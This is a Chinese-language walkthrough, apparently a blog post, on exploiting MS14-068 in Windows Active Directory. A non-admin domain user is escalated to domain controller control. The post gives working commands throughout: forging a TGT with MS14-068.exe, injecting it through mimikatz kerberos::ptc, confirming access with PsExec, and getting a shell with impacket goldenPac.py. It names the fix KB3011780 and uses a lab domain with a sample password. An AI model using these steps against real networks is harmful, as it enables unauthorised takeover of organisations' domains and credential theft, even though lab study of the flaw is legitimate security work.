前言:
在寫該篇文章之前,本人已經寫過了關於域滲透之黃金票據和白銀票據的利用方式,今天的內容也是關於域滲透提權的利用,並且MS14-068這個exp也是由kerberos協議而來。
在實際的滲透過程中,獲得了一個域成員(非管理員)的賬號後,如果剛好域控機器未打補丁(KB3011780)這是官方給出的修復補丁,那麼就可以利用MS14-068該exp來快速獲得域控權限。
準備:
1:域用戶和密碼
2:minikatz工具
3:MS14-068.exe
4:08主域控一臺和win7域內機器一臺
5:kali系統中安裝impacket工具包
Windows下利用方式:
第一步:登錄win7域成員機器,執行whoami /all獲取sid將sid號複製下來。
第二步:使用MS14-068.exe工具生成票據,網上的版本有很多,有py版本的,有windows可執行文件exe版本的,工具的鏈接本文就不提供了,直接操作,命令如下:
ms14-068 -u 域用戶名@域名 -p 域用戶密碼 -s 域sid號 -d 域控主機名
第三步:執行成功了以後,會生成一個TGT票據,打開mimikatz工具,首先查看當前票據:kerberos::list
然後清空當前票據:kerberos::purge
第四步:將生成的TGT票據文件通過minikatz寫入到內存中,命令:kerberos::ptc C:\Users\yukong_user\Desktop\[email protected],提示ok表示寫入成功,通過kerberos::list查看是否生效
票據已經成功寫入!
第五步:此時權限已經是最高權限,我們可以執行Psexec.exe來判斷,可以看到是可以成功連接,並且此時權限也是最高的。
PS:本人在復現的時候,由於昨天晚上虛擬機未關機,所以域控機器自己更新了 補丁,把對應的KB3011780補丁給打上了,導致一直復現失敗,後來嘗試直接卸載補丁,也無法進行復現,所以就將域控環境重新搭建了,域名也更換爲test.com,最後一張圖裏面表現出來了。
kali下利用:
第一步:開始的時候也介紹了,在kali下可以利用impacket工具包裏面的goldenPac.py利用方式如下
python goldenPac.py -dc-ip 1.1.1.1 -target-ip 2.2.2.2 domain.net/normaluser:mypwd@domain-host
-dc-ip 是主域控的ip地址
-target-ip 也是主域控的ip地址
domain.net 是域名 比如:hydra.com這種的
/ 是當前域用戶 比如:yukong_user
:冒號後面是當前域用戶的密碼
@ 後輸入主域計算機名 比如:dc.hydra.com
第二步:執行如下語句,返回cmd交互shell表示利用成功。
python goldenPac.py -dc-ip 192.168.107.146 -target-ip 192.168.107.146 test.com/yukong_user:jimolang1231..@dc.test.com
